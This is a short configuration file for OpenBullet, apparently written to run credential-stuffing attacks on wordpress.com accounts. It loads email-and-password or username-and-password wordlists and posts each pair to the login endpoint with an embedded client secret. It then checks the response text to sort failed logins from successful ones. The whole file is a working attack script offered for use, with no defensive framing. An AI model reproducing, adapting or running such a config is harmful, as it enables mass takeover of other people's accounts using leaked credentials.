[SETTINGS]
{
  "Name": "Wordpress",
  "SuggestedBots": 55,
  "MaxCPM": 0,
  "LastModified": "2019-07-20T04:23:43.2198224+03:00",
  "AdditionalInfo": "",
  "Author": "Serpent",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://wordpress.com/wp-login.php?action=login-endpoint" 
  CONTENT "username=<USER>&password=<PASS>&remember_me=true&redirect_to=https%3A%2F%2Fwordpress.com%2F&client_id=39911&client_secret=cOaYKdrkgXz8xY7aysv4fU6wL6sK5J8a6ojReEIAPwggsznj4Cb6mW0nffTxtYT8&domain" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://wordpress.com" 
  HEADER "referer: https://wordpress.com/" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Oops, that's not the right password. Please try again!" 
    KEY "User does not exist." 
  KEYCHAIN Success OR 
    KEY "{\"success\":true,\"" 

